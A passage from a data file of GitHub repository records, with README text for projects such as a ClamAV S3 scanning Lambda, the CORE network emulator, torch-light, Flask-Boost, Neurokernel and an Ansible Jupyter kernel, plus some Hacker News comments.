FRESHCLAM_PATH | Path to ClamAV freshclam binary | ./bin/freshclam | No |\n| DATADOG_API_KEY | API Key for pushing metrics to DataDog (optional) | | No |\n| AV_PROCESS_ORIGINAL_VERSION_ONLY | Controls that only original version of an S3 key is processed (if bucket versioning is enabled) | False | No |\n| AV_DELETE_INFECTED_FILES | Controls whether infected files should be automatically deleted | False | No |\n| EVENT_SOURCE | The source of antivirus scan event \"S3\" or \"SNS\" (optional) | S3 | No |\n| S3_ENDPOINT | The Endpoint to use when interacting wth S3 | None | No |\n| SNS_ENDPOINT | The Endpoint to use when interacting wth SNS | None | No |\n| LAMBDA_ENDPOINT | The Endpoint to use when interacting wth Lambda | None | No |\n\n## S3 Bucket Policy Examples\n\n### Deny to download the object if not \"CLEAN\"\n\nThis policy doesn't allow to download the object until:\n\n1. The lambda that run Clam-AV is finished (so the object has a tag)\n2. The file is not CLEAN\n\nPlease make sure to check cloudtrail for the arn:aws:sts, just find the event open it and copy the sts.\nIt should be in the format provided below:\n\n```json\n {\n \"Effect\": \"Deny\",\n \"NotPrincipal\": {\n \"AWS\": [\n \"arn:aws:iam::<>:role/<>\",\n \"arn:aws:sts::<>:assumed-role/<>/<>\",\n \"arn:aws:iam::<>:root\"\n ]\n },\n \"Action\": \"s3:GetObject\",\n \"Resource\": \"arn:aws:s3:::<>/*\",\n \"Condition\": {\n \"StringNotEquals\": {\n \"s3:ExistingObjectTag/av-status\": \"CLEAN\"\n }\n }\n}\n```\n\n### Deny to download and re-tag \"INFECTED\" object\n\n```json\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Deny\",\n \"Action\": [\"s3:GetObject\", \"s3:PutObjectTagging\"],\n \"Principal\": \"*\",\n \"Resource\": [\"arn:aws:s3:::<>/*\"],\n \"Condition\": {\n \"StringEquals\": {\n \"s3:ExistingObjectTag/av-status\": \"INFECTED\"\n }\n }\n }\n ]\n}\n```\n\n## Manually Scanning Buckets\n\nYou may want to scan all the objects in a bucket that have not previously been scanned or were created\nprior to setting up your lambda functions. To do this you can use the `scan_bucket.py` utility.\n\n```sh\npip install boto3\nscan_bucket.py --lambda-function-name= --s3-bucket-name=\n```\n\nThis tool will scan all objects that have not been previously scanned in the bucket and invoke the lambda function\nasynchronously. As such you'll have to go to your cloudwatch logs to see the scan results or failures. Additionally,\nthe script uses the same environment variables you'd use in your lambda so you can configure them similarly.\n\n## Testing\n\nThere are two types of tests in this repository. The first is pre-commit tests and the second are python tests. All of\nthese tests are run by CircleCI.\n\n### pre-commit Tests\n\nThe pre-commit tests ensure that code submitted to this repository meet the standards of the repository. To get started\nwith these tests run `make pre_commit_install`. This will install the pre-commit tool and then install it in this\nrepository. Then the github pre-commit hook will run these tests before you commit your code.\n\nTo run the tests manually run `make pre_commit_tests` or `pre-commit run -a`.\n\n### Python Tests\n\nThe python tests in this repository use `unittest` and are run via the `nose` utility. To run them you will need\nto install the developer resources and then run the tests:\n\n```sh\npip install -r requirements.txt\npip install -r requirements-dev.txt\nmake test\n```\n\n### Local lambdas\n\nYou can run the lambdas locally to test out what they are doing without deploying to AWS. This is accomplished\nby using docker containers that act similarly to lambda. You will need to have set up some local variables in your\n`.envrc.local` file and modify them appropriately first before running `direnv allow`. If you do not have `direnv`\nit can be installed with `brew install direnv`.\n\nFor the Scan lambda you will need a test file uploaded to S3 and the variables `TEST_BUCKET` and `TEST_KEY`\nset in your `.envrc.local` file. Then you can run:\n\n```sh\ndirenv allow\nmake archive scan\n```\n\nIf you want a file that will be recognized as a virus you can download a test file from the [EICAR](https://www.eicar.org/?page_id=3950)\nwebsite and uploaded to your bucket.\n\nFor the Update lambda you can run:\n\n```sh\ndirenv allow\nmake archive update\n```\n\n## License\n\n```text\nUpside Travel, Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n```\n\nClamAV is released under the [GPL Version 2 License](https://github.com/vrtadmin/clamav-devel/blob/master/COPYING)\nand all [source for ClamAV](https://github.com/vrtadmin/clamav-devel) is available\nfor download on Github.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "coreemu/core", "link": "https://github.com/coreemu/core", "tags": ["python", "network", "emulator", "emulation", "emulating-networks", "emane", "wireless", "rf"], "stars": 513, "description": "Common Open Research Emulator", "lang": "Python", "repo_lang": "", "readme": "# CORE\nCORE: Common Open Research Emulator\n\nCopyright (c)2005-2022 the Boeing Company.\n\nSee the LICENSE file included in this distribution.\n\n## About\nThe Common Open Research Emulator (CORE) is a tool for emulating\nnetworks on one or more machines. You can connect these emulated\nnetworks to live networks. CORE consists of a GUI for drawing\ntopologies of lightweight virtual machines, and Python modules for\nscripting network emulation.\n\n## Quick Start\nRequires Python 3.9+. More detailed instructions and install options can be found\n[here](https://coreemu.github.io/core/install.html).\n\n### Package Install\nGrab the latest deb/rpm from [releases](https://github.com/coreemu/core/releases).\n\nThis will install vnoded/vcmd, system dependencies, and CORE within a python\nvirtual environment at `/opt/core/venv`.\n```shell\nsudo install -y ./\n```\n\nThen install OSPF MDR from source:\n```shell\ngit clone https://github.com/USNavalResearchLaboratory/ospf-mdr.git\ncd ospf-mdr\n./bootstrap.sh\n./configure --disable-doc --enable-user=root --enable-group=root \\\n --with-cflags=-ggdb --sysconfdir=/usr/local/etc/quagga --enable-vtysh \\\n --localstatedir=/var/run/quagga\nmake -j$(nproc)\nsudo make install\n```\n\n### Script Install\nThe following should get you up and running on Ubuntu 22.04. This would\ninstall CORE into a python3 virtual environment and install\n[OSPF MDR](https://github.com/USNavalResearchLaboratory/ospf-mdr) from source.\n\n```shell\ngit clone https://github.com/coreemu/core.git\ncd core\n# install dependencies to run installation task\n./setup.sh\n# run the following or open a new terminal\nsource ~/.bashrc\n# Ubuntu\ninv install\n# CentOS\ninv install -p /usr\n```\n\n## Documentation & Support\nWe are leveraging GitHub hosted documentation and Discord for persistent\nchat rooms. This allows for more dynamic conversations and the\ncapability to respond faster. Feel free to join us at the link below.\n\n* [Documentation](https://coreemu.github.io/core/)\n* [Discord Channel](https://discord.gg/AKd7kmP)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ne7ermore/torch-light", "link": "https://github.com/ne7ermore/torch-light", "tags": ["deep-learning", "pytorch", "reinforcement-learning"], "stars": 513, "description": "Deep-learning by using Pytorch. Basic nns like Logistic, CNN, RNN, LSTM and some examples are implemented by complex model. ", "lang": "Python", "repo_lang": "", "readme": "

\n\n--------------------------------------------------------------------------------\n\nThis repository includes basics and advanced examples for deep learning by using [Pytorch](http://pytorch.org/).\n
\nBasics which are basic nns like Logistic, CNN, RNN, LSTM are implemented with few lines of code, advanced examples are implemented by complex model.\n
\nIt is better finish [Official Pytorch Tutorial](http://pytorch.org/tutorials/index.html) before this.\n\n##### Continue updating...\n\n## Tutorial\nGet tutorial series in [Blog](https://ne7ermore.github.io/) if know Chinese\n\n## Tabel of Pytorch Examples\n\n#### 1. Basics\n\n* [Cbow](https://github.com/ne7ermore/torch-light/tree/master/cbow)\n* [N-Gram](https://github.com/ne7ermore/torch-light/tree/master/ngram)\n* [CNN Text classfication](https://github.com/ne7ermore/torch-light/tree/master/cnn-text-classfication)\n* [LSTM Text classfication](https://github.com/ne7ermore/torch-light/tree/master/lstm-text-classfication)\n\n#### 2. Reinforcement Training\n* [AlphaGo-Zero](https://github.com/ne7ermore/torch-light/tree/master/alpha-zero)\n* [Image-Cap](https://github.com/ne7ermore/torch-light/tree/master/Image-Cap)\n* [Reinforced Translate](https://github.com/ne7ermore/torch-light/tree/master/reinforced-translate)\n* [Toy](https://github.com/ne7ermore/torch-light/tree/master/gym)\n\n#### 3. NLP\n* [Poetry VAE-NLG](https://github.com/ne7ermore/torch-light/tree/master/vae-nlg)\n* [Seq2seq](https://github.com/ne7ermore/torch-light/tree/master/seq2seq)\n* [BiLSTM CRF NER](https://github.com/ne7ermore/torch-light/tree/master/biLSTM-CRF)\n* [LSTM CNNs CRF](https://github.com/ne7ermore/torch-light/tree/master/LSTM-CNNs-CRF)\n* [Chinese Poetry NLG](https://github.com/ne7ermore/torch-light/tree/master/ch-poetry-nlg)\n* [BiMPM](https://github.com/ne7ermore/torch-light/tree/master/biMPM)\n* [Pair Ranking Cnn](https://github.com/ne7ermore/torch-light/tree/master/pair-ranking-cnn)\n* [BiLSTM CRF](https://github.com/ne7ermore/torch-light/tree/master/biLSTM-CRF-cut)\n* [Capsule Text classfication](https://github.com/ne7ermore/torch-light/tree/master/capsule-classfication)\n* [Retrieval Based Chatbots](https://github.com/ne7ermore/torch-light/tree/master/retrieval-based-chatbots)\n* [Hierarchical for Summarization and Classification](https://github.com/ne7ermore/torch-light/tree/master/hierarchical-sc)\n* [Deep SRL](https://github.com/ne7ermore/torch-light/tree/master/deep-srl)\n* [BERT](https://github.com/ne7ermore/torch-light/tree/master/BERT)\n* [Relation Network](https://github.com/ne7ermore/torch-light/tree/master/relation-network)\n* [Information Extraction](https://github.com/ne7ermore/torch-light/tree/master/information-extraction)\n* [Pointer Network](https://github.com/ne7ermore/torch-light/tree/master/pointer-network)\n* [coreference](https://github.com/ne7ermore/torch-light/tree/master/coreference)\n\n#### 4. Vision\n* [yolo-v3](https://github.com/ne7ermore/torch-light/tree/master/yolo-v3)\n* [DenseNet](https://github.com/ne7ermore/torch-light/tree/master/DenseNet)\n* [Neural Style](https://github.com/ne7ermore/torch-light/tree/master/neural-artistic-style)\n* [DC Gan](https://github.com/ne7ermore/torch-light/tree/master/dc-gan)\n* [Facial Beauty Prediction](https://github.com/ne7ermore/torch-light/tree/master/facial-beauty-prediction)\n\n#### 5. Special Things\n* [Customize](https://github.com/ne7ermore/torch-light/tree/master/Customize)\n\n#### 6. Speech\n* [Voice Conversion](https://github.com/ne7ermore/torch-light/tree/master/voice-conversion)\n\n## Getting Started\n\n### clone code\n```\n$ git clone git@github.com:ne7ermore/torch-light.git\n```\n### train\n\n```\n$ cd torch-light/project\n$ python3 main.py\n```\n\nor\n\n```\n$ cd torch-light/project\n$ python3 corpus.py\n$ python3 main.py\n```\n\nor\n\n```\n$ cd torch-light/project\n$ python3 corpus.py\n$ python3 train.py\n```\n\n## Citation\nIf you find this code useful for your research, please cite:\n```\n@misc{TaoTorchLight,\n author = {Ne7ermore Tao},\n title = {torch-light},\n publisher = {GitHub},\n year = {2020},\n howpublished = {\\url{https://github.com/ne7ermore/torch-light}}\n}\n```\n\n## Contact\nFeel free to contact me if there is any question (Tao liaoyuanhuo1987@gmail.com).\nTao Ne7ermore/ [@ne7ermore](https://github.com/ne7ermore)\n\n## Dependencies\n* [Python 3.5](https://www.python.org)\n* [PyTorch 0.2.0](http://pytorch.org/)\n* [Numpy 1.13.1](http://www.numpy.org/)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zhengmin1989/ROP_STEP_BY_STEP", "link": "https://github.com/zhengmin1989/ROP_STEP_BY_STEP", "tags": [], "stars": 513, "description": "\u4e00\u6b65\u4e00\u6b65\u5b66ROP", "lang": "Python", "repo_lang": "", "readme": "# ROP_STEP_BY_STEP\n\nAuthor Weibo: steamed rice spark http://www.weibo.com/zhengmin1989\n\nArticle address:\nhttp://drops.wooyun.org/author/%E8%92%B8%E7%B1%B3\n\nThe full name of ROP is Return-oriented programming (return-oriented programming), which is an advanced memory attack technology that can\nUsed to bypass various common defenses of modern operating systems (such as DEP, ASLR, etc.). In the tutorial we will bring linux_x86, linux_x64\nAnd the use of ROP in android (arm), welcome to learn.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "python-cmd2/cmd2", "link": "https://github.com/python-cmd2/cmd2", "tags": ["python", "command-line", "cli", "terminal", "shell", "developer-tools", "auto-completion", "scripting", "unicode", "tab-completion", "subcommands"], "stars": 513, "description": "cmd2 - quickly build feature-rich and user-friendly interactive command line applications in Python", "lang": "Python", "repo_lang": "", "readme": "Application Name, Description\n[Jok3r](http://www.jok3r-framework.com),Network & Web Pentest Automation Framework\n[CephFS Shell](https://github.com/ceph/ceph),'[Ceph](https://ceph.com/) is a distributed object, block, and file storage platform'\n[psiTurk](https://psiturk.org),An open platform for science on Amazon Mechanical Turk\n[Poseidon](https://github.com/CyberReboot/poseidon),Leverages software-defined networks (SDNs) to acquire and then feed network traffic to a number of machine learning techniques.\n[Unipacker](https://github.com/unipacker/unipacker),Automatic and platform-independent unpacker for Windows binaries based on emulation\n[tomcatmanager](https://github.com/tomcatmanager/tomcatmanager),A command line tool and python library for managing a tomcat server\n[Expliot](https://gitlab.com/expliot_framework/expliot),Internet of Things (IoT) exploitation framework\n[mptcpanalyzer](),Tool to help analyze mptcp pcaps\n[clanvas](https://github.com/marklalor/clanvas),Command-line client for Canvas by Instructure\n\nOldies but goodie,,\n[JSShell](https://github.com/Den1al/JSShell),An interactive multi-user web JavaScript shell.\n[FLASHMINGO](https://github.com/fireeye/flashmingo),Automatic analysis of SWF files based on some heuristics. Extensible via plugins.", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hustlzp/Flask-Boost", "link": "https://github.com/hustlzp/Flask-Boost", "tags": [], "stars": 513, "description": "Flask application generator for boosting your development.", "lang": "Python", "repo_lang": "", "readme": "Flask-Boost\n===========\n\n.. image:: http://img.shields.io/pypi/v/flask-boost.svg\n :target: https://pypi.python.org/pypi/flask-boost\n :alt: Latest Version\n.. image:: http://img.shields.io/pypi/dm/flask-boost.svg\n :target: https://pypi.python.org/pypi/flask-boost\n :alt: Downloads Per Month\n.. image:: http://img.shields.io/pypi/pyversions/flask-boost.svg\n :target: https://pypi.python.org/pypi/flask-boost\n :alt: Python Versions\n.. image:: http://img.shields.io/badge/license-MIT-blue.svg\n :target: https://github.com/hustlzp/Flask-Boost/blob/master/LICENSE\n :alt: The MIT License\n\nFlask application generator for boosting your development.\n\nFeatures\n--------\n\n* **Well Defined Project Structure**\n\n * Use factory pattern to generate Flask app.\n * Use Blueprints to organize controllers.\n * Split controllers, models, forms, utilities, assets, Jinja2 pages, Jinja2 macros into different directories.\n * Organize Jinja2 page assets (HTML, JavaScript, CSS) to the same directory.\n * Organize Jinja2 macro assets (HTML, JavaScript, CSS) to the same directory.\n\n* **Batteries Included**\n\n * Use Flask-SQLAlchemy and Flask-Migrate as database tools.\n * Use Flask-WTF to validate forms.\n * Use Flask-Script to help writing scripts.\n * Use permission_ to define permissions.\n * Use Bootstrap as frontend framework.\n * Use Bower to manage frontend packages.\n * Use Gulp and FIS_ to compile static assets.\n * Use Gunicorn to run Flask app and Supervisor to manage Gunicorn processes.\n * Use Fabric as deployment tool.\n * Use Sentry to log exceptions.\n * Use Nginx to serve static files.\n\n* **Scaffold Commands**\n\n * Generate project files: ``boost new ``\n * Generate controller files: ``boost new controller ``\n * Generate action files: ``boost new action [-t]``\n * Generate form files: ``boost new form
``\n * Generate model files: ``boost new model ``\n * Generate macro files: ``boost new macro `` or ``boost new macro ``\n\n.. _permission: https://github.com/hustlzp/permission\n\nInstallation\n------------\n\n::\n\n pip install flask-boost\n\nDevelopment Guide\n-----------------\n\nInit project\n~~~~~~~~~~~~\n\n::\n\n boost new \n\nSetup backend requirements\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n \n::\n\n cd \n virtualenv venv\n . venv/bin/activate (venv\\Scripts\\activate in Windows)\n pip install -r requirements.txt\n\n**Note**: if you failed in ``pip install -r requirements.txt`` in Windows, try to install package binaries directly:\n\n* pycrpyto: try to follow this article compiling-pycrypto-on-win7-64_, or get the complied pycrypyto library directly: archive_pycrpyto_library_.\n\n.. _compiling-pycrypto-on-win7-64: https://yorickdowne.wordpress.com/2010/12/22/compiling-pycrypto-on-win7-64/\n.. _archive_pycrpyto_library: http://archive.warshaft.com/pycrypto-2.3.1.win7x64-py2.7x64.7z\n\nInit database\n~~~~~~~~~~~~~\n\nCreate database with name ``your_project_name`` and encoding ``utf8``.\n\nUpdate ``SQLALCHEMY_DATABASE_URI`` in ``config/development.py`` as needed.\n\nThen init tables::\n\n python manage.py db upgrade\n\nRun app\n~~~~~~~\n\nRun local server::\n\n python manage.py run\n\nSetup frontend requirements\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nInstall Node.js first and then install Bower_, FIS_ and Gulp_ globally::\n\n npm install -g bower\n npm install -g fis\n npm install -g fis-postpackager-simple\n npm install -g gulp\n\nInstall local packages::\n\n npm install\n bower install\n\nRun Gulp watch task\n~~~~~~~~~~~~~~~~~~~\n\n::\n\n gulp watch\n\nLiveReload support\n~~~~~~~~~~~~~~~~~~\n\nInstall LiveReload browser extension from here_.\n\nAnd use ``python manage.py live`` instead of ``python manage.py run`` to start app.\n\n.. _here: http://livereload.com/extensions/\n\nScaffold commands\n~~~~~~~~~~~~~~~~~\n\n::\n\n boost new \n boost new controller \n boost new action [-t]\n boost new form \n boost new model \n boost new macro \n boost new macro \n boost -v\n boost -h\n\nRecommended IDE\n~~~~~~~~~~~~~~~\n\nPyCharm_ is the recommended IDE for Flask-Boost.\n\nRecommended preferences:\n\n* In ``Preferences -> Project -> Project Interpreter``, set ``venv`` as project interpreter.\n* In ``Preferences -> Project -> Project Structure``, set ``application/pages`` and ``application/macros`` as template folders, set ``application`` and ``application/static/css`` as resource folders.\n* In ``Language & Frameworks -> JavaScript -> Bower``, set ``bower.json`` as bower.json.\n\nRecommended PyCharm plugins:\n\n* .ignore\n* Markdown\n* Bootstrap3\n\n.. _PyCharm: https://www.jetbrains.com/pycharm/\n\nFirst Production Deploy\n-----------------------\n\nConfig server\n~~~~~~~~~~~~~\n\nInstall mysql-server, python-virtualenv, git, supervisor, nginx, g++, python-dev, libmysqlclient-dev, libxml2-dev, libxslt-dev on your server.\n\nInstall requirements\n~~~~~~~~~~~~~~~~~~~~\n\n::\n\n git clone **.git\n cd \n virtualenv venv\n . venv/bin/activate\n pip install -r requirements.txt\n\nConfig app\n~~~~~~~~~~\n\nSave ``config/production_sample.py`` as ``config/production.py``, update configs in ``config/production.py`` as needed and transfer it to server.\n\n**Note**: remember to update ``SECRET_KEY`` in ``config/production.py``! You can generate random secret key as follows::\n\n>>> import os\n>>> os.urandom(24)\n\nInit database\n~~~~~~~~~~~~~\n\nCreate database with name ``your_project_name`` and encoding ``utf8``.\n\nAnd run::\n\n export MODE=PRODUCTION\n python manage.py db upgrade\n\nCopy config files\n~~~~~~~~~~~~~~~~~\n\nUpdate project root path as needed in ``deploy/nginx.conf`` and ``deploy/supervisor.conf``.\n\n::\n\n cp deploy/flask_env.sh /etc/profile.d/\n cp deploy/nginx.conf /etc/nginx/conf.d/.conf\n cp deploy/supervisor.conf /etc/supervisor/conf.d/.conf\n\nBuild assets\n~~~~~~~~~~~~\n\nInstall Node.js first and then install Bower_, FIS_ and Gulp_ globally::\n\n npm install -g bower\n npm install -g fis\n npm install -g fis-postpackager-simple\n npm install -g gulp\n\nInstall local packages::\n\n npm install\n bower install\n\nThen::\n\n gulp\n python manage.py build\n\n.. _Bower: http://bower.io\n.. _FIS: http://fex-team.github.io/fis-site/\n.. _Gulp: http://gulpjs.com\n\nStart app\n~~~~~~~~~\n\n::\n\n service nginx restart\n service supervisor restart\n\nDaily Production Deploy\n-----------------------\n\nUpdate ``HOST_STRING`` in config with the format ``user@ip``.\n\nCommit your codes and run::\n\n git push && fab deploy\n\nP.S. If you wanna to deploy flask with Apache2, see this_ post.\n\n.. _this: https://www.digitalocean.com/community/tutorials/how-to-use-apache-http-server-as-reverse-proxy-using-mod_proxy-extension\n\nLicense\n-------\n\nMIT\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "neurokernel/neurokernel", "link": "https://github.com/neurokernel/neurokernel", "tags": ["drosophila", "gpu", "neural", "brain", "simulation"], "stars": 513, "description": "Neurokernel Project", "lang": "Python", "repo_lang": "", "readme": ".. -*- rst -*-\n\n.. image:: https://raw.githubusercontent.com/neurokernel/neurokernel/master/docs/source/_static/logo.png\n :alt: Neurokernel\n\nPackage Description\n-------------------\n\n`Project Website `_ |\n`GitHub Repository `_ |\n`Online Documentation `_ |\n`Mailing List `_ |\n`Forum `_\n\nNeurokernel is a Python framework for developing models of\nthe fruit fly brain and executing them on multiple NVIDIA GPUs.\n\n.. image:: http://prime4commit.com/projects/98.svg\n :target: http://prime4commit.com/projects/98\n :alt: Support the project\n\nPrerequisites\n-------------\nNeurokernel requires\n\n* Linux (other operating systems may work, but have not been tested);\n* Python;\n* at least one NVIDIA GPU with `Fermi\n `_\n architecture or later;\n* NVIDIA's `GPU drivers `_;\n* `CUDA `_ 5.0 or later;\n* `OpenMPI `_ 1.8.4 or later compiled with CUDA support.\n\nTo check what GPUs are in your system, you can use the `inxi\n`_ command available on most Linux\ndistributions::\n\n inxi -G\n\nYou can verify that the drivers are loaded as follows::\n\n lsmod | grep nvidia\n\nIf no drivers are present, you may have to manually load them by running\nsomething like::\n\n modprobe nvidia\n\nas root.\n\nAlthough some Linux distributions do include CUDA in their stock package\nrepositories, you are encouraged to use those distributed by NVIDIA because they\noften are more up-to-date and include more recent releases of the GPU drivers.\nSee `this page `_ for download\ninformation.\n\nIf you install Neurokernel in a virtualenv environment, you will need to\ninstall OpenMPI. See `this page\n`_\nfor OpenMPI installation information. *Note that OpenMPI 1.8* |openmpi_no_windows|_.\n\n.. _openmpi_no_windows: https://www.open-mpi.org/software/ompi/v1.6/ms-windows.php\n.. |openmpi_no_windows| replace:: *cannot run on Windows*\n\nSome of Neurokernel's demos require either `ffmpeg `_ or `libav\n`_ installed to generate visualizations (see `Examples`_).\n\nInstallation\n------------\n\nConda\n^^^^^\nThe easiest way to get neurokernel is to install it in a conda environment: ::\n\n conda create -n nk python=3.7 c-compiler compilers cxx-compiler openmpi -c conda-forge -y\n conda activate nk\n python -m pip install neurokernel\n\nMake sure to enable CUDA support in the installed OpenMPI by setting: ::\n\n export OMPI_MCA_opal_cuda_support=true\n\nExamples\n--------\nIntroductory examples of how to use Neurokernel to build and integrate models of different\nparts of the fly brain are available in the `Neurodriver\n`_ package. To install it run the\nfollowing: ::\n\n git clone https://github.com/neurokernel/neurodriver\n cd ~/neurodriver\n python setup.py develop\n\nOther models built using Neurokernel are available on\n`GitHub `_.\n\nBuilding the Documentation\n--------------------------\nTo build Neurokernel's HTML documentation locally, you will need to install\n\n* `mock `_ 1.0 or later.\n* `sphinx `_ 1.3 or later.\n* `sphinx_rtd_theme `_ 0.1.6 or\n later.\n\nOnce these are installed, run the following: ::\n\n cd ~/neurokernel/docs\n make html\n\nAuthors & Acknowledgements\n--------------------------\nSee the included `AUTHORS`_ file for more information.\n\n.. _AUTHORS: AUTHORS.rst\n\nLicense\n-------\nThis software is licensed under the `BSD License\n`_.\nSee the included `LICENSE`_ file for more information.\n\n.. _LICENSE: LICENSE.rst\n\nNotes\n-----\nThe Neurokernel Project is independent of the NeuroKernel Operating System\ndeveloped by `NeuroDNA Computer `_.\n", "readme_type": "rst", "hn_comments": "Based on the current rate of processor development we will probably be able to model a human brain in realtime around 2045 on a supercomputer.We can model the processing of a human now but it is exceedingly slow, and it is just toy calculations. So even if we can model a mind in 2045 it will may be a long time after that before it can be done in a meaningful way.In the meantime we will probably be able to model humans in a more simplistic way. Our external interactions are simple. If we can record all interactions of a person over time we can develop a cognitive profile and develop a 'beta' copy of that person. Not a real thinking AI, but to someone interacting with that copy essentially the real thing.People are working on this topic now but they're a long way away. I'm guessing 2035.There is a similar project called OpenWorm, that aims to simulate a nematode completely. It's pretty cool, you should check it outhttp://www.openworm.org/Quoting from the course front page:Students with extensive software engineering experience (systems software, parallel programming or computer graphics) are strongly encouraged to apply.Almost makes me want to go back to grad school. Look at these folks, they made GPU-enabled code available as Python's SciKit[1]But then I see they're patenting stuff left and right [2] and my enthusiasm for this project dwindles....[1] http://www.bionet.ee.columbia.edu/code/scikits.cuda[2] http://www.bionet.ee.columbia.edu/patents/There is another project in prospect - CruzPa - that attempts to model a human brain specifically selected for its apparent simplicity. http://www.buzzfeed.com/ilanbenmeir/the-most-controversial-t...According to the specs a fruit fly is smarter than my mobile.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ansible/ansible-jupyter-kernel", "link": "https://github.com/ansible/ansible-jupyter-kernel", "tags": [], "stars": 513, "description": "Jupyter Notebook Kernel for running Ansible Tasks and Playbooks", "lang": "Python", "repo_lang": "", "readme": "# Ansible Jupyter Kernel\n\n[![Build Status](https://travis-ci.com/ansible/ansible-jupyter-kernel.svg?branch=master)](https://travis-ci.com/ansible/ansible-jupyter-kernel)\n[![Binder](https://mybinder.org/badge.svg)](https://mybinder.org/v2/gh/ansible/ansible-jupyter-kernel/master)\n\n\n\n![Example Jupyter Usage](https://raw.githubusercontent.com/ansible/ansible-jupyter-kernel/master/docs/example_session.png)\n\nThe Ansible [Jupyter](http://jupyter.readthedocs.io/en/latest/) Kernel adds a kernel backend for Jupyter to interface directly with Ansible and construct plays and tasks and execute them on the fly.\n\n## Demo\n\n[![Demo](https://raw.githubusercontent.com/ansible/ansible-jupyter-kernel/master/docs/ansible_jupyter_kernel_vimeo.png)](https://vimeo.com/279049946 \"Run Ansible Tasks from Jupyter Notebook - Click to Watch!\")\n\n\n## Table of Contents\n\n* [Installation](#installation)\n * [From pypi](#from-pypi)\n * [From a local checkout](#from-a-local-checkout)\n* [Usage](#usage)\n * [Using the cells](#using-the-cells)\n * [Examples](#examples)\n* [Using the development environment](#using-the-development-environment)\n\n## Installation:\n\n`ansible-kernel` is available to be installed from pypi but you can also install it locally. The setup package itself will register the kernel\nwith `Jupyter` automatically.\n\n### From pypi\n\n pip install ansible-kernel\n python -m ansible_kernel.install\n\n### From a local checkout\n\n pip install -e .\n python -m ansible_kernel.install\n\n### For Anaconda/Miniconda\n\n pip install ansible-kernel\n python -m ansible_kernel.install --sys-prefix\n\n## Usage\n\n### Local install\n\n```\n jupyter notebook\n # In the notebook interface, select Ansible from the 'New' menu\n```\n\n### Container\n\n docker run -p 8888:8888 benthomasson/ansible-jupyter-kernel\n\n Then copy the URL from the output into your browser:\n http://localhost:8888/?token=ABCD1234\n\n\n## Using the Cells\n\nNormally `Ansible` brings together various components in different files and locations to launch a playbook and performs automation tasks. For this\n`jupyter` interface you need to provide this information in cells by denoting what the cell contains and then finally writing your tasks that will make\nuse of them. There are [Examples](#examples) available to help you, in this section we'll go over the currently supported cell types.\n\nIn order to denote what the cell contains you should prefix it with a pound/hash symbol (#) and the type as listed here as the first line as shown in the examples\nbelow.\n\n#### #inventory\n\nThe inventory that your tasks will use\n\n```\n#inventory\n[all]\nahost ansible_connection=local\nanotherhost examplevar=val\n```\n\n#### #play\n\nThis represents the opening block of a typical `Ansible` play\n\n```\n#play\nname: Hello World\nhosts: all\ngather_facts: false\n```\n\n#### #task\n\nThis is the default cell type if no type is given for the first line\n\n```\n#task\ndebug:\n```\n\n```\n#task\nshell: cat /tmp/afile\nregister: output\n```\n\n#### #host_vars\n\nThis takes an argument that represents the hostname. Variables\ndefined in this file will be available in the tasks for that host.\n\n```\n#host_vars Host1\nhostname: host1\n```\n\n#### #group_vars\n\nThis takes an argument that represents the group name. Variables\ndefined in this file will be available in the tasks for hosts in that\ngroup.\n\n```\n#group_vars BranchOfficeX\ngateway: 192.168.1.254\n```\n\n#### #vars\n\nThis takes an argument that represents the filename for use in later cells\n\n```\n#vars example_vars\nmessage: hello vars\n```\n\n```\n#play\nname: hello world\nhosts: localhost\ngather_facts: false\nvars_files:\n - example_vars\n```\n\n#### #template\n\nThis takes an argument in order to create a templated file that can be used in later cells\n\n```\n#template hello.j2\n{{ message }}\n```\n\n```\n#task\ntemplate:\n src: hello.j2\n dest: /tmp/hello\n```\n\n#### #ansible.cfg\n\nProvides overrides typically found in ansible.cfg\n\n```\n#ansible.cfg\n[defaults]\nhost_key_checking=False\n```\n\n### Examples\n\nYou can find various [example notebooks in the repository](https://github.com/ansible/ansible-jupyter-kernel/tree/master/notebooks)\n\n## Using the development environment\n\nIt's possible to use whatever python development process you feel comfortable with. The repository itself includes mechanisms for\nusing [pipenv](https://github.com/pypa/pipenv)\n\n```\npipenv install\n...\npipenv shell\n```\n", "readme_type": "markdown", "hn_comments": "I have been making Jupyter notebook for managing our container environment. Some work is still only possible through Ansible, so I've been wondering how to integrate that. Well, I need not wonder no more!This looks very promising:* auto completion!* integrated documentation!* exporting Ansible YAML!I didn't yet have change to play with this, so I just note the ways I see Jupyter can be good fit for Ansible. You can try each step and see it working before moving to next one. There doesn't seem to be support yet for richer results view nor Jupyter Widgets, but imagine looking at actual error messages and result views instead of JSON as text. Getting and setting parameters for playbooks could be done using external data sources instead of hand-crafting inventories and config files. You could use same approach as Ara [1] and trace execution of tasks.I assume you can run Ansible kernel from JupyterLab instance, so you can do file management and use terminal right on the machine you're running Ansible commands. Also, I'd imagine connecting with Jupyter Console (formerly IPython) to same kernel state as notebook is running with is possible here as well. This provides Terminal goodness alongside browser's visuals.[1] Ara: http://ara.readthedocs.io/en/latest/I really like the idea of notebooks for ops tasks - its a great combination of code, documentation and step by step execution. I'm surprised it is not more popular.Until there is a meaningful `git diff` for jupyter notebooks I can't see them being a step in 